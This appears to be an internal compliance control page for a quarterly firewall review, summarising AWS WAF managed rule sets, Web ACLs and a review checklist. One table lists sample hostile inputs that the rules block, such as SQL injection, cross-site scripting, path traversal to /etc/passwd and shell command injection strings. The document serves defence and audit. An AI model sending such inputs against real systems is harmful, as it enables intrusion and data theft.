Leadline Inc.COM-05: Quarterly Firewall Review
Implementation of quarterly firewall review process for configuration and security assessment
Control Description
On a quarterly basis, the Company performs a review of all firewalls supporting the in-scope applications and related databases. This quarterly review includes base configuration, administrative access, monitoring, and security settings, and a change request is documented for any required changes as a result of the review.
Plain Meaning
This control requires conducting a comprehensive review of all firewall configurations every three months. The review should examine firewall rules, administrative access controls, monitoring capabilities, and security settings. Any changes needed as a result of the review must be documented through a formal change request process before implementation.
AWS WAF Managed Rules Overview
AWS WAF provides managed rule sets that help protect web applications from common web exploits. These rules are automatically updated by AWS to address emerging threats and vulnerabilities.
Managed Rule Descriptions
| Rule Name | Description | Primary Protection |
|---|---|---|
| AWS-AWSManagedRulesAmazonIpReputationList | Blocks requests from IP addresses that are known to be associated with malicious activities, including botnets, scrapers, and other threat actors | IP reputation-based blocking |
| AWS-AWSManagedRulesAnonymousIpList | Blocks requests from IP addresses associated with anonymizing services, VPNs, and proxy servers that may be used to hide malicious activities | Anonymous proxy/VPN blocking |
| AWS-AWSManagedRulesCommonRuleSet | Provides protection against common web vulnerabilities including SQL injection, cross-site scripting (XSS), and other OWASP Top 10 threats | General web application security |
| AWS-AWSManagedRulesLinuxRuleSet | Specifically targets Linux-specific attack patterns and exploits commonly used against Linux-based web servers and applications | Linux-specific attacks |
| AWS-AWSManagedRulesSQLiRuleSet | Focuses on SQL injection attacks, blocking malicious SQL queries and database manipulation attempts | SQL injection attacks |
| AWS-AWSManagedRulesKnownBadInputsRuleSet | Blocks requests containing known malicious payloads, scripts, and input patterns commonly used in web attacks | Malicious input patterns |
What Each Rule Blocks
| Rule | Blocks | Examples |
|---|---|---|
| Amazon IP Reputation List | • Known malicious IP addresses • Botnet IPs • Scraper IPs • Threat actor IPs | • IPs from recent data breaches • Known DDoS botnet IPs • Malware command & control servers |
| Anonymous IP List | • VPN exit nodes • Proxy servers • Tor exit nodes • Anonymous hosting services | • Requests from commercial VPN services • Tor network exit points • Anonymous hosting providers |
| Common Rule Set | • SQL injection attempts • Cross-site scripting (XSS) • Path traversal attacks • Remote file inclusion | • ' OR 1=1--• <script>alert('xss')</script>• ../../../etc/passwd |
| Linux Rule Set | • Linux-specific exploits • Shell command injection • Linux path manipulation • System call exploits | • ; cat /etc/passwd• $(whoami)• /bin/bash commands |
| SQLi Rule Set | • SQL injection patterns • Database enumeration • SQL error exploitation • Union-based attacks | • UNION SELECT• DROP TABLE• EXEC xp_cmdshell |
| Known Bad Inputs | • Malicious scripts • Exploit payloads • Malware signatures • Attack tool patterns | • PHP shell uploads • JavaScript exploits • Malware dropper scripts |
Related Links
AWS WAF Web ACLs
A Web ACL (Web Access Control List) in AWS WAF is a central resource that defines a set of rules to inspect and control web requests to our applications. Web ACLs allow us to associate managed rule groups (like those described above), custom rules, and rate-based rules to protect our resources.
Key Features of AWS WAF Web ACLs:
- Attach to Amazon CloudFront distributions, Application Load Balancers (ALB), or API Gateway stages.
- Combine multiple managed and custom rules for layered protection.
- Set default actions (allow, block, count) for requests that do not match any rule.
- Monitor and log web requests for audit and review.
Example: Quarterly Firewall Review with AWS WAF Web ACL
A quarterly firewall review should include:
- Reviewing all Web ACLs and their associated rules.
- Verifying that only necessary rules are enabled and that rule priorities are correct.
- Ensuring that managed rule groups are up-to-date and custom rules reflect current business requirements.
- Documenting any changes or exceptions as part of the change management process.
Sample Checklist for Quarterly Review:
- List all Web ACLs and their associated resources.
- Review each rule group (managed and custom) for relevance and effectiveness.
- Check for any overly permissive rules or exceptions.
- Validate logging and monitoring configuration.
- Document findings and required changes.
Further Reading: